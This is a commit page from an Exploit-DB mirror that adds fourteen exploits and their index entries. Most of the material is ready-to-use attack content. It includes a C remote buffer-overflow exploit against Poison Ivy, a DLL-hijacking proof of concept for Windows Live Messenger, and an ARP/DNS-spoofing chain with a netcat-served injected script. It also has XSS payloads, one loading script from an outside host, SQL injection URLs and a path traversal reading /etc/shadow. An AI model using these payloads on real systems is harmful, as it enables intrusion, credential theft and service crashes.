bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-18

Browse source 
14 new exploits
This commit is contained in:
Offensive Security 2015-01-18 08:36:34 +00:00
parent 6b868b6b79
commit 7bb980404f
15 changed files with 415 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -32244,3 +32244,17 @@ id,file,description,date,author,platform,type,port
35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption Vulnerability",2011-05-24,"Andy Davis",multiple,remote,0 35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption Vulnerability",2011-05-24,"Andy Davis",multiple,remote,0
35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 'ajax-chat.php' Cross Site Scripting Vulnerability",2011-05-24,"High-Tech Bridge SA",php,webapps,0 35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 'ajax-chat.php' Cross Site Scripting Vulnerability",2011-05-24,"High-Tech Bridge SA",php,webapps,0
35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Vulnerability",2011-05-24,"Kacper Szczesniak",multiple,remote,0 35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Vulnerability",2011-05-24,"Kacper Szczesniak",multiple,remote,0
35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-25,KedAns-Dz,php,webapps,0
35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component SQL Injection Vulnerability",2011-05-25,"ThunDEr HeaD",php,webapps,0
35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 '_kurl' Parameter Cross Site Scripting Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0
35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 Directory Traversal Vulnerability",2011-05-25,"Brian W. Gary",linux,remote,0
35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera UDP Packet Password Information Disclosure Vulnerability",2011-05-25,"Spare Clock Cycles",hardware,remote,0
35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0
35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 'keywordraw' Parameter Cross Site Scripting Vulnerability",2011-05-25,"Matt Jezorek",cgi,webapps,0
35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection Vulnerabilities",2011-05-30,KedAns-Dz,php,webapps,0
35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution Vulnerability",2011-05-28,"Kacper Szczesniak",multiple,remote,0
35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow Vulnerability",2011-05-27,"Kevin R.V",windows,remote,0
35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 'userContextMenu_parameter' Parameter Cross Site Scripting Vulnerability",2011-05-31,LiquidWorm,asp,webapps,0
35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 'index.php' Cross Site Scripting Vulnerability",2011-05-31,"Stefan Schurtz",php,webapps,0
35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-05-31,Kalashinkov3,windows,remote,0
35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0

Can't render this file because it is too large.

11
platforms/asp/webapps/35807.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/48051/info
Kentico CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Kentico CMS 5.5R2.23 is vulnerable; other versions may also be affected.
POST http://localhost/examples/webparts/membership/users-viewer.aspx HTTP/1.1
&userContextMenu_parameter=%22%20onmouseover%3Dalert%281%29%20zsl%3D%22

9
platforms/cgi/webapps/35802.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48009/info
Blackboard Learn is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Blackboard Learn 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/bin/common/search.pl?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=abcd&keywordraw=%22abcd%22/%3E%3Cscript+src%3Dhttp://www.example2.com/js/alert.js%3E%3C/script%3E%3Ca+href%3D%22test%22%3Ewhat%3C/a&x=26&y=15&by=user_id

9
platforms/hardware/remote/35800.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47976/info
The RXS-3211 IP camera is prone to an information-disclosure vulnerability.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.
the following proof of concept is available:
\xff\xff\xff\xff\xff\xff\x00\x06\xff\xf9

9
platforms/linux/remote/35799.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47975/info
Vordel Gateway is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.
Vordel Gateway 6.0.3 is vulnerable; other versions may also be affected.
http://www.example.com:8090/manager/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow

23
platforms/linux/remote/35801.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/48008/info
Asterisk is prone to a user-enumeration weakness.
An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.
This issue affects Asterisk 1.8.4.1; other versions may also be affected.
REGISTER sip:192.168.2.1 SIP/2.0
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:500@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:500@192.168.2.1>
Refer-To: sip:500@192.168.2.1
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70

14
platforms/linux/remote/35810.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/48056/info
The 'libxml2' library is prone to multiple memory-corruption vulnerabilities, including one that can trigger a heap-based buffer-overflow error and an integer-overflow condition.
An attacker can exploit these issues by enticing an unsuspecting user into opening a specially crafted XML file that contains a malicious XPath.
A successful attack can allow attacker-supplied code to run in the context of the application using the vulnerable library or can cause a denial-of-service condition.
//@*/preceding::node()/ancestor::node()/ancestor::foo['foo']

18
platforms/multiple/remote/35805.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/48030/info
Gadu-Gadu is prone to a remote code-execution vulnerability.
Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected application.
Gadu-Gadu 10.5 is affected; other versions may also be vulnerable.
# echo 1 > /proc/sys/net/ipv4/ip_forward
# arp -s GW_IP GW_MAC
# arpspoof -i eth0 GW_IP
# echo "YOURIP *.adocean.pl" > /tmp/x
# dnsspoof -i eth0 -f /tmp/x
# while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection:
close\r\nContent-Length: 239\r\nContent-Type:
text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a
id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click',
true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done

10
platforms/php/webapps/35796.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/47970/info
MidiCMS Website Builder is prone to a local file-include vulnerability and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.
MidiCMS Website Builder 2011 is vulnerable; other versions may also be affected.
http://www.example.com/admin/jscripts/tiny_mce/plugins/ezfilemanager/index.php
http://www.example.com/?html=../../../../../../../../../../boot.ini%00

7
platforms/php/webapps/35797.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47971/info
The 'com_shop' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_shop&task=viewproduct&editid=[SQLi]

9
platforms/php/webapps/35798.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47973/info
Kryn.cms is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Kryn.cms 0.9 is vulnerable; other versions may also be affected.
http://www.example.com/kyrn/index.php?_kurl=%3Cscript%3Ealert%280%29%3C/script%3E

10
platforms/php/webapps/35803.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/48028/info
Cotonti is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Cotonti 0.9.2 is vulnerable; other versions may also be affected.
http://www.example.com/users.php?s=-2+AND+31337=0
http://www.example.com/forums.php?m=topics&s=offtopic&ord=-2+AND+31337=0

15
platforms/php/webapps/35808.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/48054/info
Serendipity Freetag-plugin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Serendipity Freetag-plugin 3.21; prior versions may also be affected.
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>

170
platforms/windows/remote/35806.c Executable file
View file

@ -0,0 +1,170 @@
source: http://www.securityfocus.com/bid/48039/info
Poison Ivy is prone to an unspecified buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Poison Ivy 2.3.2 is vulnerable; other versions may also be affected.
# Exploit Title: Poison Ivy 2.3.2 (Latest version) remote buffer overflow
# Google Dork: No dorks.
# Date: 27/05/11
# Author: Kevin R.V <kevin.nullbyte@gmail.com>
# Software Link: http://www.poisonivy-rat.com/dl.php?file=PI232
# Version: 2.3.2
# Tested on: Windows XP SP2
# CVE : No exist.
/* Poison Ivy 2.3.2 Remote Buffer Overflow
* Author: Kevin R.V <kevin.nullbyte@gmail.com>
* Date: 2011
* License: Totally free 8-)
* */
#include <iostream>
#include <winsock2.h>
#define VERS "0.1"
int connected;
using namespace std;
char payload[] = {
0xb2, 0xa8, 0xc3, 0x17, 0x1c, 0x1b, 0x99, 0xb9,
0x4c, 0xab, 0x8b, 0x88, 0x3a, 0x20, 0x13, 0xb3,
0x72, 0x0e, 0x57, 0xbc, 0x9f, 0x81, 0xb9, 0x08,
0x61, 0x30, 0x87, 0x74, 0xea, 0x65, 0xb5, 0x4a,
0xc9, 0xfc, 0x87, 0xe3, 0x95, 0x9e, 0xcd, 0xcd,
0x40, 0x98, 0xd2, 0x1f, 0x31, 0xee, 0x96, 0x83,
0x3d, 0x0a, 0xfe, 0xb8, 0x9b, 0xf2, 0xe7, 0x10,
0x23, 0x64, 0xfe, 0xe9, 0x10, 0xc4, 0x9c, 0xf7,
0x29, 0xe5, 0x6b, 0xe3, 0x54, 0xbb, 0x18, 0x8b,
0x07, 0x81, 0x92, 0x5e, 0xbb, 0x35, 0x6f, 0xe4,
0x23, 0x4a, 0x0c, 0xd0, 0x1f, 0x3b, 0xd4, 0x9a,
0x5c, 0x94, 0xad, 0x8b, 0xed, 0xa4, 0xed, 0xb2,
0x14, 0x23, 0x04, 0xa5, 0xfd, 0x8e, 0x8c, 0x9b,
0xc8, 0x0f, 0x78, 0xbf, 0xf2, 0xe4, 0xfe, 0x28,
0xe9, 0x3c, 0x5d, 0x86, 0x16, 0xff, 0x59, 0x7d,
0x70, 0x6d, 0x18, 0x2d, 0xdf, 0x28, 0x66, 0x02,
0xde, 0xca, 0x20, 0xe6, 0xfd, 0xe7, 0xbf, 0x4d,
0xe8, 0x8c, 0x69, 0xdd, 0x40, 0x22, 0x8f, 0x2f,
0x55, 0x54, 0xb1, 0x60, 0x86, 0x29, 0xd0, 0x3d,
0xc7, 0x01, 0xb5, 0xdc, 0xbf, 0x63, 0x28, 0xd2,
0x4e, 0xe6, 0x29, 0xed, 0x5c, 0xee, 0x17, 0x53,
0xe1, 0x11, 0x5c, 0x61, 0x9b, 0xb0, 0xfc, 0x71,
0x6e, 0x46, 0xa9, 0x27, 0xa8, 0x21, 0x05, 0x67,
0x86, 0x24, 0x86, 0x01, 0xb8, 0xd7, 0x65, 0x11,
0x36, 0xe5, 0x16, 0x05, 0xdc, 0x8c, 0x7c, 0xa7,
0xb9, 0xee, 0xbe, 0xa6, 0xcf, 0x88, 0x67, 0x56,
0xaa, 0x61, 0xe3, 0x2c, 0x72, 0xbf, 0x5b, 0xee,
0x18, 0xc4, 0x65, 0x2c, 0x4a, 0x0d, 0x88, 0x2e,
0xad, 0x96, 0x67, 0xab, 0xc1, 0xb1, 0x95, 0x03,
0x36, 0xc8, 0x04, 0xbf, 0xe8, 0x29, 0x5a, 0xf5,
0x83, 0xe5, 0x5f, 0xe4, 0x0e, 0xe2, 0x6f, 0x6b,
0x93, 0x80, 0xe7, 0x25, 0xca, 0x44, 0xa8, 0x48 };
char payload2[] = {
0xc6, 0xa7, 0x53, 0xce, 0xdc, 0x1c, 0xdc, 0x74,
0x9a, 0xc7, 0x31, 0xdf, 0x2a, 0x21, 0x5f, 0x0e,
0x7e, 0xe6, 0x1e, 0xa1, 0xb5, 0x17, 0xc4, 0x9f,
0x4a, 0x7a, 0x81, 0xde, 0x90, 0x13, 0x37, 0x2d,
0x62, 0x3c, 0xb6, 0x10, 0x2d, 0x44, 0x57, 0xa2,
0xa0, 0xdd, 0xcb, 0x90, 0xd3, 0x83, 0x1a, 0xda,
0x89, 0x97, 0x68, 0x61, 0xce, 0x38, 0xc1, 0xc4,
0xe8, 0xb0, 0xfa, 0x0b, 0x64, 0x12, 0x73, 0xf0,
0x28, 0x24, 0x2b, 0x51, 0x78, 0x15, 0xfa, 0x27,
0xcc, 0xc7, 0x5c, 0x5c, 0x3a, 0xf8, 0xea, 0x5e,
0xd9, 0x6e, 0xd4, 0x96, 0xa0, 0x8d, 0x99, 0x13,
0x84, 0x99, 0xff, 0xba, 0x41, 0xed, 0xf3, 0x1c,
0x67, 0xb6, 0xaa, 0x5a, 0x95, 0xfd, 0x92, 0x23,
0x9a, 0x72, 0x86, 0xcd, 0xf6, 0xa1, 0xb9, 0x44,
0xbc, 0x15, 0xc3, 0xac, 0xaa, 0xd6, 0x65, 0xf1,
0x08, 0x19, 0xf5, 0x2a, 0x62, 0xe4, 0x0d, 0x4e,
0x14, 0x1f, 0x21, 0x4d, 0x0c, 0x22, 0x06, 0x98,
0x84, 0x74, 0xf7, 0xaa, 0x18, 0x90, 0xd7, 0xe5,
0x2d, 0x04, 0x45, 0xb4, 0x2f, 0xbc, 0xdc, 0x97,
0xd2, 0x9b, 0x25, 0xe5, 0x4d, 0xb3, 0x51, 0x5f,
0x1a, 0x93, 0xe4, 0x97, 0x51, 0xc7, 0xd9, 0x81,
0x52, 0xee, 0x11, 0x83, 0x51, 0xb1, 0xd5, 0x34,
0x6f, 0xf1, 0xea, 0x9e, 0xbf, 0x4b, 0x6e, 0x33,
0x0d, 0x8a, 0x73, 0x15, 0xb9, 0xde, 0x92, 0x53,
0xd3, 0xfd, 0x5a, 0xcf, 0x69, 0xde, 0x19, 0x29,
0x05, 0xa1, 0x50, 0x78, 0x14, 0x81, 0xe5, 0xf1,
0x74, 0xea, 0x8c, 0x82, 0x58, 0x93, 0x74, 0x4f,
0x5a, 0x77, 0xb5, 0xde, 0x17, 0xd1, 0x48, 0x44,
0x1b, 0x1f, 0x32, 0x30, 0x9f, 0x64, 0x7c, 0x22,
0x4e, 0xd4, 0x1a, 0xae, 0x77, 0x01, 0x2b, 0x1f };
char payload3[] = {
0xe0, 0xf5, 0x3d, 0xc1, 0xf0, 0xea, 0x15, 0xdb,
0x43, 0x3e, 0x65, 0xf8, 0x9b, 0xe2, 0x14, 0xba,
0x90, 0x48, 0x5c, 0xd5, 0xec, 0x70, 0xa3, 0x8b,
0x41, 0x72, 0x28, 0x50, 0xec, 0xf6, 0xd5, 0x2a,
0xe6, 0x06, 0x46, 0xb2, 0xc5, 0x0c, 0x96, 0x6a,
0x69, 0x86, 0x6b, 0x12, 0xe4, 0x93, 0xe5, 0x11 };
int PoC(char * host, unsigned int port)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock;
struct sockaddr_in local;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
local.sin_family = AF_INET;
local.sin_addr.s_addr = inet_addr(host);
local.sin_port = htons(port);
if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
{
connected = 1;
cout << ".";
for(long int i = 0; i<99; i++)
{
sendto(sock, payload, sizeof(payload), 0, (struct sockaddr *)&local,sizeof(local));
sendto(sock, payload2, sizeof(payload2), 0, (struct sockaddr *)&local,sizeof(local));
sendto(sock, payload3, sizeof(payload3), 0, (struct sockaddr *)&local,sizeof(local));
}
PoC(host, port);
}
else
{
if ( connected )
cout << endl << endl << "[+] Congrats, poison-ivy crashed!!" << endl;
else
cout << endl << endl << "[-] Sorry not poison ivy detected 8-(" << endl;
}
}
int main(int argc, char *argv[])
{
cout << "Poison-ivy remote buffer overflow " VERS << endl << endl;
cout << "by Kevin R.V <kevin.nullbyte@gmail.com" << endl;
if ( argc < 2 )
{
cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl;
exit(-1);
}
u_short port;
char * ip;
for(int i = 0; i<argc; i++)
{
if( ! strcmp(argv[i], "-h") != 0 )
ip = argv[i+1];
else if( ! strcmp(argv[i], "-p") != 0 )
port = atoi(argv[i+1]);
}
cout << "[+] Starting exploit" << endl << endl;
PoC(ip, port);
return 1;
}

87
platforms/windows/remote/35809.c Executable file
View file

@ -0,0 +1,87 @@
source: http://www.securityfocus.com/bid/48055/info
Microsoft Windows Live Messenger is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm kalashinkov3 member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#########################################################
# Title : Msn Live Messenger14.0=>Plus! DLL Hijacking Exploit (dwmapi.dll)
# Author: Kalashinkov3
# Home : 13000/ ALGERIA
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 31/05/2011
# Category : Local Exploit
# Tested on: [Windows Xp Sp3 Fr]
#########################################################
# File Vulnerable:
- msnmsgr.exe
# Vulnerable extensions:
- .plsk
" Vulnerable Dll's:
dwmapi.dll
./
#include <windows.h>
#define DLLIMPORT _declspec (dllexport)
DLLIMPORT void DwmDefWindowProc() { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void DwmEnableComposition() { evil(); }
DLLIMPORT void DwmEnableMMCSS() { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void DwmGetColorizationColor() { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void DwmGetWindowAttribute() { evil(); }
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void DwmRegisterThumbnail() { evil(); }
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void DwmSetPresentParameters() { evil(); }
DLLIMPORT void DwmSetWindowAttribute() { evil(); }
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
^_^ GOOD LUCK ALL :)
+ Greets To==================================================================+
+
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 +
ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com +
andhrahackers.com, all Algerians Hacker'S ;) & 1337day.com/team +
# All My Friends # +
=============================================================================+